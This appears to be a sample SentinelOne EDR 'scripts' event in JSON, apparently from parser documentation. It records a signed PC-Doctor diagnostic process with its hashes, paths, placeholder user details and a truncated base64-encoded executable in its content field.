- } - ``` - - - -=== "script" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFQFVBJWAT35E5D075MQ1408", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631802162798" - }, - "event_type": "scripts", - "source": { - "node": { - "key": { - "value": "35A565744E7A266A" - } - }, - "executable": { - "node": { - "key": { - "value": "FBFFF74AA755328C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "5518152", - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC.", - "valid": {} - } - }, - "hashes": { - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa", - "md5": "423050654da76dab9c2866ba3c13ce38" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe\" /child", - "fullPid": { - "pid": 14832, - "startTime": { - "millisecondsSinceEpoch": "1631802162671" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "04DEDAAF23E16398" - } - }, - "executable": { - "node": { - "key": { - "value": "DED9F9357E5C5C30" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1631802160011" - }, - "path": "C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "5518152", - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC.", - "valid": {} - } - }, - "hashes": { - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa", - "md5": "423050654da76dab9c2866ba3c13ce38" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe\" /NA /noui", - "fullPid": { - "pid": 1780, - "startTime": { - "millisecondsSinceEpoch": "1631802161886" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "EDA8D6AB348AAE7D" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": " ", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "HIGH", - "isWow64": "E_TRUE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B21DD2505AAA5F2" - } - }, - "counters": { - "modelChildProcess": 1, - "osChildProcess": 1, - "crossProcess": 2, - "moduleLoad": 237, - "fileCreation": 1, - "fileDeletion": 1, - "fileModification": 32, - "exeModification": 3, - "netConnOut": 2, - "registryModification": 3, - "crossProcessDupProcessHandle": 2 - } - }, - "excluded": "E_FALSE", - "name": " ", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "HIGH", - "isWow64": "E_TRUE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B21DD2505AAA5F2" - } - }, - "counters": { - "moduleLoad": 224, - "fileCreation": 3, - "fileDeletion": 3, - "fileModification": 33, - "netConnOut": 3, - "registryModification": 1, - "dnsLookups": 1 - } - }, - "targetFile": { - "node": { - "key": {} - }, - "creationTime": {}, - "owner": {}, - "hashes": {} - }, - "content": "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BioAABMwBgA3AAAAEwAAESiPAAAGLC8UfvYCAAQCGY0EAAABCgYWA4wtAAAbogYXBIwuAAAbogYYBYwvAAAbogYogwAABio6An72AgAEAxQohQAABipqKI8AAAYsEgJ+9gIABANvagAAChQohQAABio6FH73AgAEAgMohQAABio6FH73AgAEAhQohQAABipqKJAAAAYsEhR+9wIABAJvagAAChQohQAABio6An73AgAEAwQohQAABioAAAATMAYAJQAAABMAABEokAAABiwdFH73AgAEAheNBAAAAQoGFgOMLQAAG6IGKIMAAAYqAAAAEzAGAC4AAAATAAARKJAAAAYsJhR+9wIABAIYjQQAAAEKBhYDjC0AABuiBhcEjC4AABuiBiiDAAAGKgAAEzAGADcAAAATAAARKJAAAAYsLxR+9wIABAIZjQQAAAEKBhYDjC0AABuiBhcEjC4AABuiBhgFjC8AABuiBiiDAAAGKjoCfvcCAAQDFCiFAAAGKmookAAABiwSAn73AgAEA29qAAAKFCiFAAAGKjoUfvgCAAQCAyiFAAAGKjoUfvgCAAQCFCiFAAAGKmookQAABiwSFH74AgAEAm9qAAAKFCiFAAAGKjoCfvgCAAQDBCiFAAAGKgAAABMwBgAlAAAAEwAAESiRAAAGLB0UfvgCAAQCF40EAAABCgYWA4wtAAAbogYogwAABioAAAATMAYALgAAABMAABEokQAABiwmFH74AgAEAhiNBAAAAQoGFgOMLQAAG6IGFwSMLgAAG6IGKIMAAAYqAAATMAYANwAAABMAABEokQAABiwvFH74AgAEAhmNBAAAAQoGFgOMLQAAG6IGFwSMLgAAG6IGGAWMLwAAG6IGKIMAAAYqOgJ++AIABAMUKIUAAAYqaiiRAAAGLBICfvgCAAQDb2oAAAoUKIUAAAYqOhR++QIABAIDKIUAAAYqOhR++QIABAIUKIUAAAYqaiiSAAAGLBIUfvkCAAQCb2oAAAoUKIUAAAYqOgJ++QIABAMEKIUAAAYqAAAAEzAGACUAAAATAAARKJIAAAYsHRR++QIABAIXjQQAAAEKBhYDjC0AABuiBiiDAAAGKgAAABMwBgAuAAAAEwAAESiSAAAGLCYUfvkCAAQCGI0EAAABCgYWA4wtAAAbogYXBIwuAAAbogYogwAABioAABMwBgA3AAAA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